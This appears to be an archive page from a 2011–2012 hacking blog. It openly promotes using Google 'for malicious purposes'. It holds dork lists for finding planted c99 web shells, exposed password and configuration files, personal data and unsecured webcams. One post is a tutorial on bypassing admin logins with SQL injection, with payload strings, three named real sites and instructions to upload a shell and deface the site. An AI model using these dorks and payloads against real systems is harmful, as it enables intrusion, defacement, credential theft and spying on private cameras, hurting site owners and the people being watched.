Showing posts with label Google Hacking. Show all posts
Showing posts with label Google Hacking. Show all posts

Monday, 30 April 2012

Google Dorks : Backdoored c99 (Find Already Uploaded c99 Shells)

Following are is a google dorks which can be used to find already uploaded shells via Google.


Dork List : 


safe-mode: off (not secure) drwxrwxrwx c99shell
inurl:c99.php
inurl:c99.php uid=0(root)
root c99.php
"Captain Crunch Security Team" inurl:c99
inurl:c99.php
allinurl: c99.php
inurl:c99.php
inurl:"c99.php" c99shell
inurl:c99.php uid=0(root)
c99shell powered by admin
c99shell powered by admin
inurl:"/c99.php"
inurl:c99.php
c99 shell v.1.0 (roots)
inurl:c99.php
allintitle: "c99shell"
inurl:"c99.php
allinurl: "c99.php"
inurl:c99.php
intitle:C99Shell v. 1.0 pre-release +uname
allinurl: "c99.php"
inurl:c99.php
inurl:"c99.php" c99shell
inurl:"/c99.php
inurl:/c99.php+uname
allinurl:"c99.php"
inurl:"c99.php"
allinurl:c99.php
"inurl:c99..php"
c99shell [file on secure ok ]?
powered by Captain Crunch Security Team
allinurl:c99.php
"c99.php" filetype:php
allinurl:c99.php
inurl:c99.php
allinurl:.c99.php
"inurl:c99.php"
c99. PHP-code Feedback Self remove
allinurl:c99.php
download c99.php
allinurl:c99.php
inurl:c99.php
allinurl: "c99.php"
intitle:C99Shell v. 1.0 pre-release +uname
allinurl:"c99.php"
inurl:c99.php
safe-mode: off (not secure) drwxrwxrwx c99shell
c99.php download
inurl:c99.php
c99shell filetype:php -echo
inurl:"c99.php"
inurl:c99.php uid=0(root)
allinurl:c99.php
inurl:"/c99.php" intitle:"C99shell"
C99Shell v. 1.0 pre-release build #5
--[ c99shell v. 1.0 pre-release build #16
c99shell linux infong
C99Shell v. 1.0 pre-release build
!C99Shell v. 1.0 beta!
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
!c99shell v. 1+Safe-mode: OFF (not secure)
"C99Shell v. 1.0 pre-release build "
intitle:c99shell +filetype:php
inurl:c99.php
intitle:C99Shell v. 1.0 pre-release +uname
intitle:!C99Shell v. 1.0 pre-release build #16! root
!C99Shell v. 1.0 pre-release build #5!
inurl:"c99.php"
C99Shell v. 1.0 pre-release build #16!
intitle:c99shell intext:uname
allintext:C99Shell v. 1.0 pre-release build #12
c99shell v. 1.0 pre-release build #16
--[ c99shell v. 1.0 pre-release build #15 | Powered by ]--
allinurl: "c99.php"
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout
"c99shell v 1.0"
ftp apache inurl:c99.php
c99shell+v.+1.0 16
C99Shell v. 1.0 pre-release build #16 download
intitle:c99shell "Software: Apache"
allinurl: c99.php
allintext: Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove
intitle:c99shell uname -bbpress
intitle:"index.of" c99.php
inurl:admin/files/
intitle:"index of /" "c99.php"
intitle:"index of" intext:c99.php
intitle:index.of c99.php
intitle:"index of" + c99.php
intitle:index/of file c99.php
intitle:index/of file c99.php
index of /admin/files/
intitle:"Index of/"+c99.php
c99.php "intitle:Index of "
intitle:index.of c99.php
img/c99.php
intitle:index.of c99.php
img.c99.php
intitle:"Index of/"+c99.php
"index of /" c99.php
c99.php
intitle:"Index of" c99.php
"index of" c99.php
"Index of/"+c99.php




Refer the below links for more hacking with Google Dorks :


Google Dorks : Learn How To Use Google For Hacking
Google Dorks : Digging The Web Much Deeper
Google Dorks : Find Unattended Security Cameras



Monday, 23 January 2012

Google Dorks:Digging the web much deeper.


Hello hackers, I here with an intresting post on how to use google for malicious purposes. I have already posted a articles on Google Dorks and how to use them while hacking titled as Google Dorks:Learn How to Use Google for hacking. Here is another article for all you hungry hackers on how to use google to dig information deeper on the web which can be used for hacking and malicious stuff.

Dorks for locating Network devices:

                      Dork                                                                  Device
"Copyright (c) Tektronix, Inc." "printer status"           PhaserLink printers
inurl:"printer/main.html" intext:"settings"                     Brother HL printers
intitle:"Dell Laser Printer" ews                                    Dell printers with EWS technology
intext:centreware inurl:status                                       Xerox Phaser 4500/6250/8200/8400 printers
inurl:hp/device/this.LCDispatcher                               HP printers
intitle:liveapplet inurl:LvAppl                                      Canon Webview webcams
intitle:"EvoCam" inurl:"webcam.html"                         Evocam webcams
inurl:"ViewerFrame?Mode="                                      Panasonic Network Camera webcams
inurl:indexFrame.shtml Axis                                        Axis webcams
SNC-RZ30 HOME                                                    Sony SNC-RZ30 webcams
intitle:"my webcamXP server!" inurl:":8080"               Webcams accessible via WebcamXP Server
allintitle:Brains, Corp.                                                 Camera webcams accessible via mmEye
intitle:"active webcam page"                                       USB webcams



Dorks for searching confidential and personal data and documents:

                       Dork                                                                  Result
filetype:xls inurl:"email.xls"                                 Files and documents containing Contact Information
"not for distribution"                                           Confidential documents
buddylist.blt                                                          AIM contacts list
intitle:index.of mystuff.xml                                  Trillian IM contacts list
filetype:ctt "msn"                                                 MSN contacts list
intitle:"Index Of"-inurl:maillog maillog size      Containing e-mail


Dorks for loacting Stored passwords:

                                 Dork                                                                                         Result
"http://*:*@www" site                                                                                         passwords for site, stored as the string "http://username:password@www..."
filetype:bak inurl:"htaccess|passwd|shadow|htusers"                                              file backups, potentially containing user names and passwords
filetype:mdb inurl:"account|users|admin|administrators|passwd|password"              mdb files, potentially containing password information
intitle:"Index of" pwd.db pwd.db files,                                                                  potentially containing user names and encrypted passwords
 inurl:admin inurl:backup intitle:index.of                                                                 directories whose names contain the words admin and backup
"Index of/" "Parent Directory" "WS _ FTP.ini"filetype:ini WS _ FTP PWD      WS_FTP configuration files, potentially                  containing FTP server access passwords
ext:pwd inurl:(service|authors|administrators|users) "# -FrontPage-"                   files containing Microsoft FrontPage passwords
filetype:sql ("passwd values ****" |"password values ****" | "pass values ****" )  files containing SQL code and passwords inserted into a database
intitle:index.of trillian.ini                                                                                           configuration files for the Trillian IM
eggdrop filetype:user user                                                                                       configuration files for the Eggdrop ircbot
filetype:conf slapd.conf                                                                                            configuration files for OpenLDAP
inurl:"wvdial.conf" intext:"password"                                                                   configuration files for WV Dial
ext:ini eudora.ini                                                                                                        configuration files for the Eudora mail client
filetype:mdb inurl:users.mdb                                                                                   Microsoft Access files, potentially containing user account information


Dorks for locating Webservers:

                   Dork                                                                                                                 Server
"Apache/1.3.28 Server at" intitle:index.of                                                                      Apache 1.3.28
"Apache/2.0 Server at" intitle:index.of                                                                          Apache 2.0
"Apache/* Server at" intitle:index.of                                                                             Any version of Apache
"Microsoft-IIS/4.0 Server at" intitle:index.of                                                                 Microsoft Internet Information Services 4.0
"Microsoft-IIS/5.0 Server at" intitle:index.of                                                                 Microsoft Internet Information Services 5.0
"Microsoft-IIS/6.0 Server at" intitle:index.of                                                                 Microsoft Internet Information Services 6.0
"Microsoft-IIS/* Server at" intitle:index.of                                                                    Any version of Microsoft Internet Information Services
"Oracle HTTP Server/* Server at" intitle:index.of                                                          Any version of Oracle HTTP Server
"IBM _ HTTP _ Server/* * Server at" intitle:index.of                                                   Any version of IBM HTTP Server
"Netscape/* Server at" intitle:index.of                                                                            Any version of Netscape Server
"Red Hat Secure/*" intitle:index.of                                                                                  Any version of the Red Hat Secure server
"HP Apache-based Web Server/*" intitle:index.of                                                       Any version of the HP server



1000s of other random Google Dorks for SQLi etc can be found Here
As I will learn more useful and intresting dorks I will keep adding them. If ou know some intresting dorks do not forget to mention them in your comment, and do not forget to mention your comment on how to felt reading this post and what you think about this blog. Keep Learning and Keep Sharing.

Sunday, 22 January 2012

Google Dorks:Find Unattended Security Camers.





Following are the google dorks which can be used to find unattented security cameras over the internet.

inurl:ViewerFrame?Mode=
intitle:Axis 2400 video server
inurl:/view.shtml
intitle:Live View / - AXIS
inurl:view/view.shtml^
inurl:ViewerFrame?Mode=
inurl:ViewerFrame?Mode=Refresh
inurl:axis-cgi/jpg
inurl:axis-cgi/mjpg (motion-JPEG)
inurl:view/indexFrame.shtml
inurl:view/index.shtml
inurl:view/view.shtml
liveapplet
intitle:live view intitle:axis
intitle:liveapplet
allintitle:Network Camera NetworkCamera
intitle:axis intitle:video server
intitle:liveapplet inurl:LvAppl
intitle:EvoCam inurl:webcam.html
intitle:Live NetSnap Cam-Server feed
intitle:Live View / - AXIS
intitle:Live View / - AXIS 206M
intitle:Live View / - AXIS 206W
intitle:Live View / - AXIS 210?
inurl:indexFrame.shtml Axis
inurl:MultiCameraFrame?Mode=Motion
intitle:start inurl:cgistart
intitle:WJ-NT104 Main Page
intext:MOBOTIX M1? intext:Open Menu
intext:MOBOTIX M10? intext:Open Menu
intext:MOBOTIX D10? intext:Open Menu
intitle:snc-z20 inurl:home/
intitle:snc-cs3 inurl:home/
intitle:snc-rz30 inurl:home/
intitle:sony network camera snc-p1?
intitle:sony network camera snc-m1?
site:.viewnetcam.com -www.viewnetcam.com
intitle:Toshiba Network Camera user login


intitle:netcam live image
intitle:i-Catcher Console - Web Monitor
inurl:”ViewerFrame?Mode=
intitle:Axis 2400 video server
inurl:/view.shtml
intitle:”Live View / - AXIS” | inurl:view/view.shtml^
inurl:ViewerFrame?Mode=
inurl:ViewerFrame?Mode=Refresh
inurl:axis-cgi/jpg
inurl:axis-cgi/mjpg (motion-JPEG)
inurl:view/indexFrame.shtml
inurl:view/index.shtml
inurl:view/view.shtml
liveapplet
intitle:”live view” intitle:axis
intitle:liveapplet
allintitle:”Network Camera NetworkCamera”
intitle:axis intitle:”video server”
intitle:liveapplet inurl:LvAppl
intitle:”EvoCam” inurl:”webcam.html”
intitle:”Live NetSnap Cam-Server feed”
intitle:”Live View / - AXIS”
intitle:”Live View / - AXIS 206M”
intitle:”Live View / - AXIS 206W”
intitle:”Live View / - AXIS 210″
inurl:indexFrame.shtml Axis
inurl:”MultiCameraFrame?Mode=Motion”
intitle:start inurl:cgistart
intitle:”WJ-NT104 Main Page”
intext:”MOBOTIX M1″ intext:”Open Menu”
intext:”MOBOTIX M10″ intext:”Open Menu”
intext:”MOBOTIX D10″ intext:”Open Menu”
intitle:snc-z20 inurl:home/
intitle:snc-cs3 inurl:home/
intitle:snc-rz30 inurl:home/
intitle:”sony network camera snc-p1″
intitle:”sony network camera snc-m1″
site:.viewnetcam.com -www.viewnetcam.com
intitle:”Toshiba Network Camera” user login
intitle:”netcam live image”
intitle:”i-Catcher Console - Web Monitor”

Thursday, 5 January 2012

Hack Website's Admin Panel using Basic SQL Injection





You might have seen hackers hacking and defaceing websites, editing it with their own stuff, makeing post on websites etc. There are many methods of doing this, In this tutorial I will be showing you a very basic and simply SQLi (Structured Query Language Injection).  I will show you how to find the websites admin panel using a simple google dork and a SQL query to bypass the admin user name and password and enter into the panel. When you are in the panel just find a upload option and upload your shell, then deface it.


Dorks: inurl:adminlogin.aspx
            inurl:admin/index.php
            inurl:administrator.php
            inurl:administrator.asp
            inurl:login.asp
            inurl:login.aspx
            inurl:login.php
            inurl:admin/index.php
            inurl:adminlogin.aspx


# Try to make your own dorks also to get more success rate.


Hundreds of sites will open up having /adminlogin.aspx in their URL. Select any website, you will get the area from where the admins login. Fill the details as:
User: 1'or'1'='1
Password: 1'or'1'='1


Use the above mentioned login details and you will be into the admin panel of a website. I will not work for all the websites you will find, but will work on most of the website. 


Some websites which I got:
http://gimtech.in/Webadmin/AdminLogin.aspx
http://welkinindiagroup.com/admin/adminlogin.aspx
http://nobinsolutions.com/Adminlogin.aspx





Other InjecTion Queries:
‘ or 1=1 –
1'or’1'=’1
admin’–
” or 0=0 –
or 0=0 –
‘ or 0=0 #
” or 0=0 #
or 0=0 #
‘ or ‘x’='x
” or “x”=”x
‘) or (‘x’='x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’='a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ‘a’='a
hi’) or (‘a’='a
hi”) or (“a”=”)




Saturday, 12 November 2011

GOOGLE DORKS:Learn how to use Google for Hacking.



Ever wondered GOOGLE the world's most popular and powerful search engine can be used for malicious purposes. Google has the ability to accept pre-defined commands as input and produce unbeliviable results which enables hackers,crackers, and script kiddies etc to use Google search engine to gather confidential or sensitive information which are not visible  through common searches. You can find websites vulnerable to SQL Injection, XSS attacks etc.

Google’s Advance Search Query Syntaxes-

Below disscused are various google special commands which can be used to dig some critical juicy information.

[inurl:]
The [inurl:] syntax restricts the search result to those  URLs containing the search keyword.“inurl: admin” (without quotes) will return only links to those pages that have "admin" in the URL.

[intitle:]
the [intitle:] syntax restricts the search result to the pages containing the word inside.for example "intitle: administrator password" (without quotes)will give the link to all the pages which are having Administrator as their title and the word "password" anywhere in the page.

[Link:]
Link syntax will give the pages that have the link to a specified webpage.For example,"link:www.google.com" (without quotes) will list web pages that have link pointing to Google's homepage.

[releated:]
The releated syntax will give you the webpages which are similar to a specified webpage.for example,"releated:www.google.com" will list the webpages that are similar to Google's homepage.

[phonebook:]
"phonebook"searches for US phone number information.for exampe "phonebook:jack+LA will list down all the name which are having JACK in their name and lives in Los Angeles(LA).

[ filetype: ]
Using "filetype:" syntax google searches for a particlur file type(i.e .doc, .exe etc.)for example, “filetype:txt site:gov top secret”(without quotes) will look for the file type ".txt" extension in all the government domains with .gov extension and containing the word top secret either in the page or in the .txt file.

Looking for vulnerable sites or servers using “intitle:” or “allintitle:”
a.)Using [allintitle: "index of /root”] (without brackets) will give you the links to the web servers which give you the access to the restricted directories like "root" through web.

b.)Using [allintitle: "index of /admin”] (without brackets) will give you the links to the websites which have indexed browsing enabled for restricted directories like "admin".


Other interesting Search Queries

To search for sites vulnerable to Cross-Sites Scripting (XSS) attacks:
allinurl:/scripts/cart32.exe
allinurl:/CuteNews/show_archives.php
allinurl:/phpinfo.php

To search for sites vulnerable to SQL Injection attacks:
allinurl:/privmsg.php
inurl:trainers.php?id=
inurl:play_old.php?id=